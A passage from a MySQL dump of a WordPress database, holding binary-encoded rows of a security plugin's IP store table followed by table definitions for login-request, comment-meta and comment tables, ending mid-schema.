(6558,'�ۻ','�ۻ',1,0,90,0),
(6559,'���','���',1,0,90,0),
(6560,'���}','���}',1,0,90,0),
(6561,'��e7','��e7',1,0,90,0),
(6562,'�e�s','�e�s',1,0,90,0),
(6563,'T��','T��',1,0,90,0),
(6564,'���','���',1,0,90,0),
(6565,'$�bq','$�bq',1,0,90,0),
(6566,'\rf$','\rf$',1,0,90,0),
(6567,'/l�','/l�',1,0,90,0),
(6568,'Qv-','Qv-',1,0,90,0),
(6569,'/8��','/8��',1,0,90,0),
(6570,'#�,�','#�,�',1,0,90,0),
(6571,'�','�',1,0,90,0),
(6572,'��\0[','��\0[',1,0,90,0),
(6573,'B�0�','B�0�',1,0,90,0),
(6574,'��!�','��!�',1,0,90,0),
(6575,'��','��',1,0,90,0),
(6576,'�� ','�� ',1,0,90,0),
(6577,' \Z�!\0�p\0\0\0���',' \Z�!\0�p\0\0\0���',1,0,90,1),
(6578,'��','��',1,0,90,0),
(6579,'�*t�','�*t�',1,0,90,0),
(6580,'�G�','�G�',1,0,90,0),
(6581,'�','�',1,0,90,0),
(6582,'$�x','$�x',1,0,90,0),
(6583,'\"d��','\"d��',1,0,90,0),
(6584,'�d�T','�d�T',1,0,90,0),
(6585,'���','���',1,0,90,0),
(6586,'���','���',1,0,90,0),
(6587,'���','���',1,0,90,0),
(6588,'�ɷ�','�ɷ�',1,0,90,0),
(6589,'s|u�','s|u�',1,0,90,0),
(6590,'���','���',1,0,90,0),
(6591,'��!','��!',1,0,90,0),
(6592,'\r�','\r�',1,0,90,0),
(6593,'��','��',1,0,90,0),
(6594,'��P','��P',1,0,90,0),
(6595,'�hb%','�hb%',1,0,90,0),
(6596,'�*t�','�*t�',1,0,90,0),
(6597,'-*/E','-*/E',1,0,90,0),
(6598,'g�','g�',1,0,90,0),
(6599,'-��}','-��}',1,0,90,0),
(6600,'&\0<\0\0\0\0\0�<����K','&\0<\0\0\0\0\0�<����K',1,0,90,1),
(6601,'-�M�','-�M�',1,0,90,0),
(6602,'Am�N','Am�N',1,0,90,0),
(6603,'��e,','��e,',1,0,90,0),
(6604,'�b�','�b�',1,0,90,0),
(6605,'��?�','��?�',1,0,90,0),
(6606,'��\'','��\'',1,0,90,0),
(6607,'��#','��#',1,0,90,0),
(6608,'�]7�','�]7�',1,0,90,0),
(6609,'��e5','��e5',1,0,90,0),
(6610,'���','���',1,0,90,0),
(6611,'��Y','��Y',1,0,90,0),
(6612,'R�&?','R�&?',1,0,90,0),
(6613,'�#r','�#r',1,0,90,0),
(6614,'��','��',1,0,90,0),
(6615,'��:','��:',1,0,90,0),
(6616,' \r��\0\0�>���t�',' \r��\0\0�>���t�',1,0,90,1),
(6617,'>ps','>ps',1,0,90,0),
(6618,'&at�','&at�',1,0,90,0),
(6619,'��e>','��e>',1,0,90,0),
(6620,'��Q','��Q',1,0,90,0),
(6621,'���','���',1,0,90,0),
(6622,'�&�','�&�',1,0,90,0),
(6623,'�','�',1,0,90,0),
(6624,'��~','��~',1,0,90,0),
(6625,'���','���',1,0,90,0),
(6626,'+���','+���',1,0,90,0),
(6627,'��c�','��c�',1,0,90,0),
(6628,'�!','�!',1,0,90,0),
(6629,'�U��','�U��',1,0,90,0),
(6630,'I���','I���',1,0,90,0),
(6631,'��\n�','��\n�',1,0,90,0),
(6632,'$�\ZX�\0m�g�b�','$�\ZX�\0m�g�b�',1,0,90,1),
(6633,'�f�','�f�',1,0,90,0),
(6634,'���','���',1,0,90,0),
(6635,'O���','O���',1,0,90,0),
(6636,'䮅','䮅',1,0,90,0),
(6637,'�װX','�װX',1,0,90,0),
(6638,'ν�b','ν�b',1,0,90,0),
(6639,'誵','誵',1,0,90,0),
(6640,'�*t�','�*t�',1,0,90,0),
(6641,'*�!XH\0\0\0\0\0\0\0','*�!XH\0\0\0\0\0\0\0',1,0,90,1),
(6642,'£�(','£�(',1,0,90,0),
(6643,'-+','-+',1,0,90,0),
(6644,'��:5','��:5',1,0,90,0),
(6645,'$\0�\0\0\0\0�<����T�','$\0�\0\0\0\0�<����T�',1,0,90,1),
(6646,'-��5','-��5',1,0,90,0),
(6647,'�Ǯ�','�Ǯ�',1,0,90,0),
(6648,' �bT\0��_��',' �bT\0��_��',1,0,90,1),
(6649,'� ','� ',1,0,90,0),
(6650,'[�\Z\Z','[�\Z\Z',1,0,90,0),
(6651,'���','���',1,0,90,0),
(6652,':T �',':T �',1,0,90,0),
(6653,'x�','x�',1,0,90,0),
(6654,'��\n','��\n',1,0,90,0),
(6655,'�{�','�{�',1,0,90,0),
(6656,'�,q','�,q',1,0,90,0),
(6657,'��e(','��e(',1,0,90,0),
(6658,'M[V_','M[V_',1,0,90,0),
(6659,'AlO�','AlO�',1,0,90,0),
(6660,'���','���',1,0,90,0),
(6661,'gx�','gx�',1,0,90,0),
(6662,'Y���','Y���',1,0,90,0),
(6663,'��e)','��e)',1,0,90,0),
(6664,'^�F','^�F',1,0,90,0),
(6665,'-��k','-��k',1,0,90,0),
(6666,'gj��','gj��',1,0,90,0),
(6667,'\\5`�','\\5`�',1,0,90,0),
(6668,'��\n�','��\n�',1,0,90,0),
(6669,'6���','6���',1,0,90,0),
(6670,'�dW�','�dW�',1,0,90,0),
(6671,'gt��','gt��',1,0,90,0),
(6672,'\"���','\"���',1,0,90,0),
(6673,'u�`I','u�`I',1,0,90,0),
(6674,'�� F','�� F',1,0,90,0),
(6675,'���}','���}',1,0,90,0),
(6676,'9��$','9��$',1,0,90,0),
(6677,'(��;-�\\�I8h}','(��;-�\\�I8h}',1,0,90,1),
(6678,'��','��',1,0,90,0),
(6679,'��l�','��l�',1,0,90,0),
(6680,'\"��','\"��',1,0,90,0),
(6681,'�2�\'','�2�\'',1,0,90,0),
(6682,'T(b','T(b',1,0,90,0),
(6683,'�w}�','�w}�',1,0,90,0),
(6684,'\"K=\r','\"K=\r',1,0,90,0),
(6685,'�:?','�:?',1,0,90,0),
(6686,'�a��','�a��',1,0,90,0),
(6687,'&U\00\0\0�\0\0\0\0\0\0\0','&U\00\0\0�\0\0\0\0\0\0\0',1,0,90,1),
(6688,'�ѓ','�ѓ',1,0,90,0),
(6689,'�','�',1,0,90,0),
(6690,'\\��','\\��',1,0,90,0),
(6691,'�;u�','�;u�',1,0,90,0),
(6692,'��G�','��G�',1,0,90,0),
(6693,'���3','���3',1,0,90,0),
(6694,'���','���',1,0,90,0),
(6695,'M�','M�',1,0,90,0),
(6696,'A�F','A�F',1,0,90,0),
(6697,'��P�','��P�',1,0,90,0),
(6698,'�.Q','�.Q',1,0,90,0),
(6699,'�m�L','�m�L',1,0,90,0),
(6700,'J��','J��',1,0,90,0),
(6701,'�A','�A',1,0,90,0),
(6702,'R�','R�',1,0,90,0),
(6703,'J��j','J��j',1,0,90,0),
(6704,'��Y','��Y',1,0,90,0),
(6705,'Њ�','Њ�',1,0,90,0),
(6706,'�G�','�G�',1,0,90,0),
(6707,' K���\0\0\0\0\0\0\0',' K���\0\0\0\0\0\0\0',1,0,90,1),
(6708,'�','�',1,0,90,0),
(6709,'g�W�','g�W�',1,0,90,0),
(6710,'J���','J���',1,0,90,0),
(6711,'��','��',1,0,90,0),
(6712,'���','���',1,0,90,0),
(6713,'(u>u','(u>u',1,0,90,0),
(6714,'J��B','J��B',1,0,90,0),
(6715,'�5','�5',1,0,90,0),
(6716,'ν�[','ν�[',1,0,90,0),
(6717,'���}','���}',1,0,90,0),
(6718,'��ӕ','��ӕ',1,0,90,0),
(6719,'J��','J��',1,0,90,0),
(6720,'��x_','��x_',1,0,90,0),
(6721,'3�,�','3�,�',1,0,90,0),
(6722,'�5P','�5P',1,0,90,0),
(6723,'���a','���a',1,0,90,0),
(6724,'%x�','%x�',1,0,90,0),
(6725,'J�','J�',1,0,90,0),
(6726,'4��','4��',1,0,90,0),
(6727,'ν\'6','ν\'6',1,0,90,0),
(6728,'�!�}','�!�}',1,0,90,0),
(6729,'��+}','��+}',1,0,90,0),
(6730,'J�ޙ','J�ޙ',1,0,90,0),
(6731,'g���','g���',1,0,90,0),
(6732,'%fg','%fg',1,0,90,0),
(6733,'���3','���3',1,0,90,0),
(6734,'�!��','�!��',1,0,90,0),
(6735,'���k','���k',1,0,90,0),
(6736,'�A�','�A�',1,0,90,0),
(6737,'^���','^���',1,0,90,0),
(6738,'��W','��W',1,0,90,0),
(6739,'ν+&','ν+&',1,0,90,0),
(6740,'J�߇','J�߇',1,0,90,0),
(6741,'�襟','�襟',1,0,90,0),
(6742,'���\r','���\r',1,0,90,0),
(6743,'��','��',1,0,90,0),
(6744,'\\5`�','\\5`�',1,0,90,0),
(6745,'����','����',1,0,90,0),
(6746,'��Z6','��Z6',1,0,90,0),
(6747,'�>+','�>+',1,0,90,0),
(6748,'j��','j��',1,0,90,0),
(6749,'�X�(','�X�(',1,0,90,0),
(6750,'���','���',1,0,90,0),
(6751,'�Y��','�Y��',1,0,90,0),
(6752,'��y�','��y�',1,0,90,0),
(6753,'�i&�','�i&�',1,0,90,0),
(6754,'��Lr','��Lr',1,0,90,0),
(6755,'��','��',1,0,90,0),
(6756,' ��\0#�[��{�',' ��\0#�[��{�',1,0,90,1),
(6757,'��','��',1,0,90,0),
(6758,'�J6x','�J6x',1,0,90,0),
(6759,'э*�','э*�',1,0,90,0),
(6760,'*�\0D�\0\0\0\0\0\0\0','*�\0D�\0\0\0\0\0\0\0',1,0,90,1),
(6761,'��m�','��m�',1,0,90,0),
(6762,'զVs','զVs',1,0,90,0),
(6763,'g�p�','g�p�',1,0,90,0),
(6764,'�i�h','�i�h',1,0,90,0),
(6765,'�5u�','�5u�',1,0,90,0),
(6766,'���E','���E',1,0,90,0),
(6767,'����','����',1,0,90,0),
(6768,'���','���',1,0,90,0),
(6769,'�Һy','�Һy',1,0,90,0),
(6770,'���F','���F',1,0,90,0),
(6771,'%�5\r','%�5\r',1,0,90,0),
(6772,'�p]`','�p]`',1,0,90,0),
(6773,'զV`','զV`',1,0,90,0),
(6774,'_o�','_o�',1,0,90,0),
(6775,'Y.lZ','Y.lZ',1,0,90,0),
(6776,'�Z��','�Z��',1,0,90,0),
(6777,'��b�','��b�',1,0,90,0),
(6778,'�;�','�;�',1,0,90,0),
(6779,'1��','1��',1,0,90,0),
(6780,'p���','p���',1,0,90,0),
(6781,'$\0�\0\0\0\0�<�����v','$\0�\0\0\0\0�<�����v',1,0,90,1),
(6782,'��%z','��%z',1,0,90,0),
(6783,'�c>!','�c>!',1,0,90,0),
(6784,'��$�','��$�',1,0,90,0),
(6785,'D��H','D��H',1,0,90,0),
(6786,'U�\Z�','U�\Z�',1,0,90,0),
(6787,'�v�','�v�',1,0,90,0),
(6788,'-��','-��',1,0,90,0),
(6789,'�ƏX','�ƏX',1,0,90,0),
(6790,'��e�','��e�',1,0,90,0),
(6791,'Vm��','Vm��',1,0,90,0),
(6792,'�X�}','�X�}',1,0,90,0),
(6793,'?�h','?�h',1,0,90,0),
(6794,'����','����',1,0,90,0),
(6795,'�PN','�PN',1,0,90,0),
(6796,'-M��','-M��',1,0,90,0),
(6797,'��S','��S',1,0,90,0),
(6798,'$\0�\0\0\0\0�<���q�','$\0�\0\0\0\0�<���q�',1,0,90,1),
(6799,'����','����',1,0,90,0),
(6800,'��\'','��\'',1,0,90,0),
(6801,'���','���',1,0,90,0),
(6802,'�r`�','�r`�',1,0,90,0),
(6803,'��','��',1,0,90,0),
(6804,'+��{','+��{',1,0,90,0),
(6805,'�8�','�8�',1,0,90,0),
(6806,'ɔhT','ɔhT',1,0,90,0),
(6807,'B��J','B��J',1,0,90,0),
(6808,'-��$','-��$',1,0,90,0),
(6809,'��T','��T',1,0,90,0),
(6810,']�DX',']�DX',1,0,90,0),
(6811,'�<��','�<��',1,0,90,0),
(6812,'��A','��A',1,0,90,0),
(6813,'*�\\�\0\0\0\0\0\0\0','*�\\�\0\0\0\0\0\0\0',1,0,90,1),
(6814,'k��','k��',1,0,90,0),
(6815,'/� S','/� S',1,0,90,0),
(6816,'�;�B','�;�B',1,0,90,0),
(6817,'��','��',1,0,90,0),
(6818,'�H�','�H�',1,0,90,0),
(6819,'m{�','m{�',1,0,90,0),
(6820,'�L��','�L��',1,0,90,0),
(6821,'��A|','��A|',1,0,90,0),
(6822,';�K',';�K',1,0,90,0),
(6823,'��','��',1,0,90,0),
(6824,'���','���',1,0,90,0),
(6825,'#���','#���',1,0,90,0),
(6826,'*\r|@0\0\0\0\0\0\0\0\0','*\r|@0\0\0\0\0\0\0\0\0',1,0,90,1),
(6827,'�;\rq','�;\rq',1,0,90,0),
(6828,'j\0\'2','j\0\'2',1,0,90,0),
(6829,'AmE','AmE',1,0,90,0),
(6830,'��e;','��e;',1,0,90,0),
(6831,'6���','6���',1,0,90,0),
(6832,'��','��',1,0,90,0),
(6833,'�','�',1,0,90,0),
(6834,'+�N','+�N',1,0,90,0),
(6835,'cO�N','cO�N',1,0,90,0),
(6836,'-�h�','-�h�',1,0,90,0),
(6837,'�ݍ','�ݍ',1,0,90,0),
(6838,'Yu#�','Yu#�',1,0,90,0),
(6839,'h��','h��',1,0,90,0),
(6840,'��Z�','��Z�',1,0,90,0),
(6841,'s`��','s`��',1,0,90,0),
(6842,'gj��','gj��',1,0,90,0),
(6843,'-wR�','-wR�',1,0,90,0),
(6844,'x�Z','x�Z',1,0,90,0),
(6845,'hȗ2','hȗ2',1,0,90,0),
(6846,'g��\n','g��\n',1,0,90,0),
(6847,'��+\n','��+\n',1,0,90,0),
(6848,'���','���',1,0,90,0),
(6849,'$I\0!��]��\0e\0','$I\0!��]��\0e\0',1,0,90,1),
(6850,'^�k','^�k',1,0,90,0),
(6851,'MA�','MA�',1,0,90,0),
(6852,'�m3U','�m3U',1,0,90,0),
(6853,'�G�-','�G�-',1,0,90,0),
(6854,'?�&�','?�&�',1,0,90,0),
(6855,'-�z|','-�z|',1,0,90,0),
(6856,'�i�:','�i�:',1,0,90,0),
(6857,'4N�d','4N�d',1,0,90,0),
(6858,'���%','���%',1,0,90,0),
(6859,'��','��',1,0,90,0),
(6860,'&\0\n�5\0T�fF�i�','&\0\n�5\0T�fF�i�',1,0,90,1),
(6861,'K�d','K�d',1,0,90,0),
(6862,'*�8�\0\0\0\0\0\0\0','*�8�\0\0\0\0\0\0\0',1,0,90,1),
(6863,'����','����',1,0,90,0),
(6864,'Ѷӫ','Ѷӫ',1,0,90,0),
(6865,'&\0<\0\0\0\0�<����U�','&\0<\0\0\0\0�<����U�',1,0,90,1),
(6866,'$H\0k���������','$H\0k���������',1,0,90,1),
(6867,'��� ','��� ',1,0,90,0),
(6868,'�t�','�t�',1,0,90,0),
(6869,'���','���',1,0,90,0),
(6870,'�[Hb','�[Hb',1,0,90,0),
(6871,'���','���',1,0,90,0),
(6872,'��P�','��P�',1,0,90,0),
(6873,'���','���',1,0,90,0),
(6874,'����','����',1,0,90,0),
(6875,')o�0',')o�0',1,0,90,0),
(6876,'*�\0ZE�\0\0\0\0\0\0\0','*�\0ZE�\0\0\0\0\0\0\0',1,0,90,1),
(6877,'��[c','��[c',1,0,90,0),
(6878,'QE\"�','QE\"�',1,0,90,0),
(6879,'R���','R���',1,0,90,0),
(6880,'�k�','�k�',1,0,90,0),
(6881,'Y���','Y���',1,0,90,0),
(6882,'>��','>��',1,0,90,0),
(6883,'�U��','�U��',1,0,90,0),
(6884,'���','���',1,0,90,0),
(6885,'&�\0`\0\0\0\0\0\rjdF','&�\0`\0\0\0\0\0\rjdF',1,0,90,1),
(6886,'�[[','�[[',1,0,90,0),
(6887,'Q[�','Q[�',1,0,90,0),
(6888,'hȗ�','hȗ�',1,0,90,0),
(6889,'�\0�','�\0�',1,0,90,0),
(6890,'M�','M�',1,0,90,0),
(6891,'����','����',1,0,90,0),
(6892,'��','��',1,0,90,0),
(6893,'���','���',1,0,90,0),
(6894,'��� ','��� ',1,0,90,0),
(6895,'N/K�','N/K�',1,0,90,0),
(6896,'�, �','�, �',1,0,90,0),
(6897,'���2','���2',1,0,90,0),
(6898,'&s�\0(>K���7�','&s�\0(>K���7�',1,0,90,1),
(6899,'���','���',1,0,90,0),
(6900,'��<�','��<�',1,0,90,0),
(6901,'^�','^�',1,0,90,0),
(6902,'�b�','�b�',1,0,90,0),
(6903,'�Z','�Z',1,0,90,0),
(6904,'�sl�','�sl�',1,0,90,0),
(6905,'��i�','��i�',1,0,90,0),
(6906,'MP','MP',1,0,90,0),
(6907,'��<','��<',1,0,90,0),
(6908,'��','��',1,0,90,0),
(6909,'j��','j��',1,0,90,0),
(6910,'w\\>B','w\\>B',1,0,90,0),
(6911,'���`','���`',1,0,90,0),
(6912,'PJ�','PJ�',1,0,90,0),
(6913,'�,7�','�,7�',1,0,90,0),
(6914,'h���','h���',1,0,90,0),
(6915,'���','���',1,0,90,0),
(6916,'l&','l&',1,0,90,0),
(6917,'��','��',1,0,90,0),
(6918,'���','���',1,0,90,0),
(6919,'£��','£��',1,0,90,0),
(6920,'Y(� ','Y(� ',1,0,90,0),
(6921,'��','��',1,0,90,0),
(6922,'���','���',1,0,90,0),
(6923,'��R�','��R�',1,0,90,0),
(6924,'�G�s','�G�s',1,0,90,0),
(6925,'g�u7','g�u7',1,0,90,0),
(6926,'T*7','T*7',1,0,90,0),
(6927,'R','R',1,0,90,0),
(6928,'H�;','H�;',1,0,90,0),
(6929,'�t_i','�t_i',1,0,90,0),
(6930,'-=�@','-=�@',1,0,90,0),
(6931,'��y','��y',1,0,90,0),
(6932,'4���','4���',1,0,90,0),
(6933,'~','~',1,0,90,0),
(6934,'���-','���-',1,0,90,0),
(6935,'�A�','�A�',1,0,90,0),
(6936,'-~}�','-~}�',1,0,90,0),
(6937,'D��','D��',1,0,90,0),
(6938,'�G�4','�G�4',1,0,90,0),
(6939,'��~','��~',1,0,90,0),
(6940,'6\'�','6\'�',1,0,90,0),
(6941,'���y','���y',1,0,90,0),
(6942,'���','���',1,0,90,0),
(6943,'&�z�','&�z�',1,0,90,0),
(6944,'>TgW','>TgW',1,0,90,0),
(6945,'��]','��]',1,0,90,0),
(6946,'�ً','�ً',1,0,90,0),
(6947,'�>�','�>�',1,0,90,0),
(6948,'h-��','h-��',1,0,90,0),
(6949,'�%','�%',1,0,90,0),
(6950,'�x�','�x�',1,0,90,0),
(6951,'�w �','�w �',1,0,90,0),
(6952,'l�*','l�*',1,0,90,0),
(6953,'A�Z','A�Z',1,0,90,0),
(6954,'K��','K��',1,0,90,0),
(6955,'�f)%','�f)%',1,0,90,0),
(6956,'(V\n�','(V\n�',1,0,90,0),
(6957,'kq�','kq�',1,0,90,0),
(6958,'�5�','�5�',1,0,90,0),
(6959,'Vj��','Vj��',1,0,90,0),
(6960,'#�-�','#�-�',1,0,90,0),
(6961,'��','��',1,0,90,0),
(6962,'�Z�C','�Z�C',1,0,90,0),
(6963,'.�&','.�&',1,0,90,0),
(6964,'gY_','gY_',1,0,90,0),
(6965,'��U�','��U�',1,0,90,0),
(6966,'���','���',1,0,90,0),
(6967,'qA �','qA �',1,0,90,0),
(6968,'��T�','��T�',1,0,90,0),
(6969,'��zC','��zC',1,0,90,0),
(6970,'�c>�','�c>�',1,0,90,0),
(6971,'���v','���v',1,0,90,0),
(6972,'��n','��n',1,0,90,0),
(6973,'4�2','4�2',1,0,90,0),
(6974,'*\0x\0�\0\0\0\0\0\0\0`�','*\0x\0�\0\0\0\0\0\0\0`�',1,0,90,1),
(6975,'R��5','R��5',1,0,90,0),
(6976,'Yu�B','Yu�B',1,0,90,0),
(6977,';�K',';�K',1,0,90,0),
(6978,'6\\Z�','6\\Z�',1,0,90,0),
(6979,'����','����',1,0,90,0),
(6980,'$\0�\0\0\0\0�<������','$\0�\0\0\0\0�<������',1,0,90,1),
(6981,'�Q��','�Q��',1,0,90,0),
(6982,'ŕ@','ŕ@',1,0,90,0),
(6983,'^��','^��',1,0,90,0),
(6984,'�k*','�k*',1,0,90,0),
(6985,'U��2','U��2',1,0,90,0),
(6986,'M[N�','M[N�',1,0,90,0),
(6987,'ʬ\Z%','ʬ\Z%',1,0,90,0),
(6988,'��','��',1,0,90,0),
(6989,'���-','���-',1,0,90,0),
(6990,'h�M`','h�M`',1,0,90,0),
(6991,'���','���',1,0,90,0),
(6992,'���','���',1,0,90,0),
(6993,'rw��','rw��',1,0,90,0),
(6994,'\"�q�','\"�q�',1,0,90,0),
(6995,'e�|','e�|',1,0,90,0),
(6996,'Q�','Q�',1,0,90,0),
(6997,'э7�','э7�',1,0,90,0),
(6998,'��V','��V',1,0,90,0),
(6999,'�w','�w',1,0,90,0),
(7000,'�%\0�','�%\0�',1,0,90,0),
(7001,'y(��','y(��',1,0,90,0),
(7002,'��ѕ','��ѕ',1,0,90,0),
(7003,'��x','��x',1,0,90,0),
(7004,'�^a','�^a',1,0,90,0),
(7005,'-T��','-T��',1,0,90,0),
(7006,'\0>�','\0>�',1,0,90,0),
(7007,'B7@�','B7@�',1,0,90,0),
(7008,'�c\0�','�c\0�',1,0,90,0),
(7009,'^b�','^b�',1,0,90,0),
(7010,'#�U','#�U',1,0,90,0),
(7011,'qm7','qm7',1,0,90,0),
(7012,'���:','���:',1,0,90,0),
(7013,'��8I','��8I',1,0,90,0),
(7014,')B�e',')B�e',1,0,90,0),
(7015,'�|,I','�|,I',1,0,90,0),
(7016,'Ҫ�','Ҫ�',1,0,90,0),
(7017,'���q','���q',1,0,90,0),
(7018,'Y���','Y���',1,0,90,0),
(7019,'э;�','э;�',1,0,90,0),
(7020,'Dɼ&','Dɼ&',1,0,90,0),
(7021,'\\5v\'','\\5v\'',1,0,90,0),
(7022,'� ','� ',1,0,90,0),
(7023,'g�A�','g�A�',1,0,90,0),
(7024,'gj��','gj��',1,0,90,0),
(7025,'tH��','tH��',1,0,90,0),
(7026,'C�','C�',1,0,90,0),
(7027,'*G�\0\0\n\0\0\0\0\0\0\0','*G�\0\0\n\0\0\0\0\0\0\0',1,0,90,1),
(7028,'ʳB�','ʳB�',1,0,90,0),
(7029,'tv2�','tv2�',1,0,90,0),
(7030,'-!|','-!|',1,0,90,0),
(7031,'��MT','��MT',1,0,90,0),
(7032,'э7�','э7�',1,0,90,0),
(7033,'n��','n��',1,0,90,0),
(7034,'��]�','��]�',1,0,90,0),
(7035,'p��2','p��2',1,0,90,0),
(7036,'���\r','���\r',1,0,90,0),
(7037,'�;f','�;f',1,0,90,0),
(7038,'rO�','rO�',1,0,90,0),
(7039,'^��','^��',1,0,90,0),
(7040,'w(P�','w(P�',1,0,90,0),
(7041,'��P[','��P[',1,0,90,0),
(7042,'��L','��L',1,0,90,0),
(7043,'g2Se','g2Se',1,0,90,0),
(7044,'t%','t%',1,0,90,0),
(7045,'AO�','AO�',1,0,90,0),
(7046,'���','���',1,0,90,0),
(7047,'��tj','��tj',1,0,90,0),
(7048,'3Ҝ','3Ҝ',1,0,90,0),
(7049,'l�U','l�U',1,0,90,0),
(7050,'*�\n��\0?[%�o��','*�\n��\0?[%�o��',1,0,90,1),
(7051,'�n�3','�n�3',1,0,90,0),
(7052,'���','���',1,0,90,0),
(7053,'/� �','/� �',1,0,90,0),
(7054,'��º','��º',1,0,90,0),
(7055,'#�i','#�i',1,0,90,0),
(7056,'-M*�','-M*�',1,0,90,0),
(7057,'[��','[��',1,0,90,0),
(7058,'N��C','N��C',1,0,90,0),
(7059,'�ªM','�ªM',1,0,90,0),
(7060,'��V\0','��V\0',1,0,90,0),
(7061,'�cA�','�cA�',1,0,90,0),
(7062,'��Xe','��Xe',1,0,90,0),
(7063,'�u','�u',1,0,90,0),
(7064,'э%(','э%(',1,0,90,0),
(7065,'�Ǭ�','�Ǭ�',1,0,90,0),
(7066,'�a��','�a��',1,0,90,0),
(7067,'�Ǭ�','�Ǭ�',1,0,90,0),
(7068,'Q���','Q���',1,0,90,0),
(7069,'��[','��[',1,0,90,0),
(7070,'���','���',1,0,90,0),
(7071,'ْR�','ْR�',1,0,90,0),
(7072,'�Ǭ�','�Ǭ�',1,0,90,0),
(7073,'�Gށ','�Gށ',1,0,90,0),
(7074,'�8�','�8�',1,0,90,0),
(7075,'���','���',1,0,90,0),
(7076,'\"fk�','\"fk�',1,0,90,0),
(7077,'(Mo;','(Mo;',1,0,90,0),
(7078,'#��@','#��@',1,0,90,0),
(7079,'#�?%','#�?%',1,0,90,0),
(7080,'���','���',1,0,90,0),
(7081,'U�t�','U�t�',1,0,90,0),
(7082,'\"ju','\"ju',1,0,90,0),
(7083,'���','���',1,0,90,0),
(7084,'��R�','��R�',1,0,90,0),
(7085,'�_��','�_��',1,0,90,0),
(7086,'4���','4���',1,0,90,0),
(7087,' �\\T\0���\\P',' �\\T\0���\\P',1,0,90,1),
(7088,'$%�g','$%�g',1,0,90,0),
(7089,'�A��','�A��',1,0,90,0),
(7090,'��^','��^',1,0,90,0),
(7091,'Rf+','Rf+',1,0,90,0),
(7092,'���','���',1,0,90,0),
(7093,'��<�','��<�',1,0,90,0),
(7094,'J��s','J��s',1,0,90,0),
(7095,'����','����',1,0,90,0),
(7096,')ؼN',')ؼN',1,0,90,0),
(7097,'%�','%�',1,0,90,0),
(7098,'\rD�&','\rD�&',1,0,90,0),
(7099,'�q','�q',1,0,90,0),
(7100,'�|�','�|�',1,0,90,0),
(7101,'4��y','4��y',1,0,90,0),
(7102,'��8b','��8b',1,0,90,0),
(7103,'��QZ','��QZ',1,0,90,0),
(7104,'4�y{','4�y{',1,0,90,0),
(7105,'�Ͻ','�Ͻ',1,0,90,0),
(7106,'s�','s�',1,0,90,0),
(7107,'���2','���2',1,0,90,0),
(7108,'ج�','ج�',1,0,90,0),
(7109,'Y{i','Y{i',1,0,90,0),
(7110,'4��n','4��n',1,0,90,0),
(7111,'�tY?','�tY?',1,0,90,0),
(7112,'����','����',1,0,90,0),
(7113,'�9 �','�9 �',1,0,90,0),
(7114,'����','����',1,0,90,0),
(7115,'�_�A','�_�A',1,0,90,0),
(7116,'�;v3','�;v3',1,0,90,0),
(7117,'T;K','T;K',1,0,90,0),
(7118,'4�r�','4�r�',1,0,90,0),
(7119,'9�\0','9�\0',1,0,90,0),
(7120,'% ��','% ��',1,0,90,0),
(7121,'��/�','��/�',1,0,90,0),
(7122,'4�y�','4�y�',1,0,90,0),
(7123,'(N�3','(N�3',1,0,90,0),
(7124,'^���','^���',1,0,90,0);
/*!40000 ALTER TABLE `wp_bv_ip_store` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_bv_lp_requests`
--
DROP TABLE IF EXISTS `wp_bv_lp_requests`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_bv_lp_requests` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`ip` varchar(50) NOT NULL DEFAULT '',
`status` int(1) NOT NULL DEFAULT 0,
`username` varchar(50) NOT NULL DEFAULT '',
`message` varchar(100) NOT NULL DEFAULT '',
`category` int(1) NOT NULL DEFAULT 0,
`time` bigint(20) NOT NULL DEFAULT 1388516401,
`request_id` varchar(200) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_bv_lp_requests`
--
LOCK TABLES `wp_bv_lp_requests` WRITE;
/*!40000 ALTER TABLE `wp_bv_lp_requests` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_bv_lp_requests` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_commentmeta`
--
DROP TABLE IF EXISTS `wp_commentmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_commentmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `comment_id` (`comment_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=315 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_commentmeta`
--
LOCK TABLES `wp_commentmeta` WRITE;
/*!40000 ALTER TABLE `wp_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_comments`
--
DROP TABLE IF EXISTS `wp_comments`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_comments` (
`comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`comment_author` tinytext NOT NULL,
`comment_author_email` varchar(100) NOT NULL DEFAULT '',
`comment_author_url` varchar(200) NOT NULL DEFAULT '',
`comment_author_IP` varchar(100) NOT NULL DEFAULT '',
`comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`comment_content` text NOT NULL,
`comment_karma` int(11) NOT NULL DEFAULT 0,
`comment_approved` varchar(20) NOT NULL DEFAULT '1',
`comment_agent` varchar(255) NOT NULL DEFAULT '',
`comment_type` varchar(20) NOT NULL DEFAULT 'comment',
`comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`comment_ID`),
KEY `comment_post_ID` (`comment_post_ID`),
